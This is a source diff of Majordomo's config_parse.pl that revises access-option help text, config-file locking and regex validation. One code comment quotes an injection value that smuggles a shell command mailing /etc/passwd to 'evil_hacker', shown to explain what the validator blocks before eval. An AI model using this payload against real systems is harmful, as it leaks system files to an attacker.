@@ -5,18 +5,13 @@
 # writes into the global variable %main'config_opts
 #
 
-# $Header: /sources/cvsrepos/majordomo/config_parse.pl,v 1.58 1996/11/22 16:33:54 cwilson Exp $
-# $Modified: Fri Nov 22 17:01:19 1996 by cwilson $
+# $Header: /sources/cvsrepos/majordomo/config_parse.pl,v 1.63 1997/04/20 16:06:58 cwilson Exp $
+# $Modified: Tue Dec 17 19:29:14 1996 by cwilson $
 
 # this array holds the interesting info for use by all tools
 %main'config_opts=();
 
-require $cf;
 require 'shlock.pl';
-# this line may not be needed in normal operation If it is, then we must
-# make sure that $cf is majordomo.pl, or its overriding -C file for
-# all commands
-#require $cf ;
 
 # here is the config package
 package config;
@@ -151,41 +146,53 @@ $installing_defaults = 0; # Set to 1 when installing defaults, in case
 # The text is wrapped and filled on output.
 %comments = (
 'get_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'index_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'who_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'which_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'info_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'intro_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'advertise',
 "If the requestor email address matches one of these
 regexps, then the list will be listed
 in the output of a lists command.
 Failure to match any regexp excludes the list from
-the output. The regexps under noadvertise overide these regexps.",
+the output. The regexps under noadvertise override these regexps.",
 				
 'comments',
 "Comment string that will be retained across config file rewrites.",
@@ -212,7 +219,7 @@ maintainer approval. Closed requires maintainer approval for all
 subscribe requests to the list.  Adding '+confirm', ie,
 'open+confirm', will cause majordomo to send a reply back to the
 subscriber which includes a authentication number which must be sent
-back in with another subscribe commad.",
+back in with another subscribe command.",
 
 'unsubscribe_policy', 
 "One of three values: open, closed, auto.  Open allows people to
@@ -292,11 +299,15 @@ address of the sender is used as the value of the reply-to header.
 This is the value of the reply-to header for digest lists.",
 
 'restrict_post',
-"If defined only address listed in one of the files (colon or
-space separated) can post to the mailing list. This is less useful than
-it seems it should be since there is no way to create these files if you
-do not have access to the machine running resend. This mechanism will
-be replaced in a future version of majordomo/resend.",
+"If defined, only addresses listed in these files (colon or
+space separated) can post to the mailing list. By default,
+these files are relative to the lists directory. These files
+are also checked when get_access, index_access, info_access,
+intro_access, which_access, or who_access is set to 'list'.
+This is less useful than it seems it should be since there
+is no way to create these files if you do not have access to
+the machine running resend. This mechanism will be replaced
+in a future version of majordomo/resend.",
 
 'resend_host',
 "The host name that is appended to all address
@@ -723,10 +734,17 @@ sub handle_flag_files {
 ########
 #
 # The function that does all of the real work.
-#     Called with a list directory and a list name.
+#     Called with a list directory, a list name, and optionally a flag
+#     that indicates the config file is already locked if true (and
+#     should be left locked on return).
+#
+# List config file locking is different than other files in that a
+# distinct lock file is used instead of just lopen() locking because
+# it's easier to manage a persistent lock than to try to keep the file
+# open (and thus locked) and pass the filehandle around.
 #
 sub main'get_config {
-  local($listdir, $list) = @_;
+  local($listdir, $list, $locked) = @_;
   local($parse, $here_doc, $stop, $end) = ();
   $end = 0;
 
@@ -763,8 +781,10 @@ sub main'get_config {
   &handle_flag_files($listdir, $list); # this looks for files of 
                                        # the form listname.function
 
-  &main'set_lock("$listdir/$list.config.LOCK") ||
-    &main'abort( "Can't get lock for $listdir/$list.config");
+  unless ($locked) {
+    &main'set_lock("$listdir/$list.config.LOCK") ||
+      &main'abort( "Can't get lock for $listdir/$list.config");
+  }
 
   print("making default\n") 
     if ($debug > 1) && (! -e "$listdir/$list.config");
@@ -773,7 +793,7 @@ sub main'get_config {
 		 unless -e "$listdir/$list.config" ;
 
   print STDERR "parsing config get_config($listdir, $list)\n" if $debug > 1;
-  &main'lopen(CONFIG, "", "$listdir/$list.config")
+  open(CONFIG, "$listdir/$list.config")
 			 || &main'abort( "Can't open $listdir/$list.config");
 
   while ($_ = <CONFIG>) {
@@ -857,9 +877,9 @@ sub main'get_config {
      }
   }
 
-&main'lclose(CONFIG);
+close(CONFIG);
 
-&main'free_lock("$listdir/$list.config.LOCK");
+&main'free_lock("$listdir/$list.config.LOCK") unless $locked;
 
 print STDERR @errors if $debug > 1;
 
@@ -1068,16 +1088,22 @@ sub grab_regexp_array {
 	    # m:yyy: ; `/bin/mail evil_hacker < /etc/passwd` ; "bar" =~ m:yyy:
 	    # END
 	    #
-	    elsif (($re =~ m:^((/)|m([^\w\s])): , $dlm=($2||$3)) &&
-		   $re !~ m:^m?$dlm[^\\$dlm]*(\\.[^\\$dlm]*)*$dlm[gimosx]*$: ){
+	    elsif ($re !~ m:^((/)|m([^\w\s])):) {
  		push(@re_errors,
  		    "|$re| not a valid pattern match expression at line $.\n");
- 	    }
- 	    elsif (eval "'' =~ $re", $@) {
- 		push(@re_errors, $@);
- 	    }
- 	    else {
- 		push(@return_re, $re);
+	    }
+	    else {
+		$dlm=($2||$3);
+		if ($re !~ m:^m?$dlm[^\\$dlm]*(\\.[^\\$dlm]*)*$dlm[gimosx]*$:) {
+		    push(@re_errors,
+ 		     "|$re| not a valid pattern match expression at line $.\n");
+		}
+		elsif (eval "'' =~ $re", $@) {
+		    push(@re_errors, $@);
+		}
+		else {
+		    push(@return_re, $re);
+		}
 	    }
  	}
 
@@ -1092,7 +1118,7 @@ sub grab_restrict_post {
 	local($list) = @_;
 	local(@files) = ();
 	
-        @files = split (/[:\t\n]+/, $list);
+        @files = split (/[:\s]+/, $list);
 	foreach (@files) {
 	    # add listdir if no leading /
 	    #
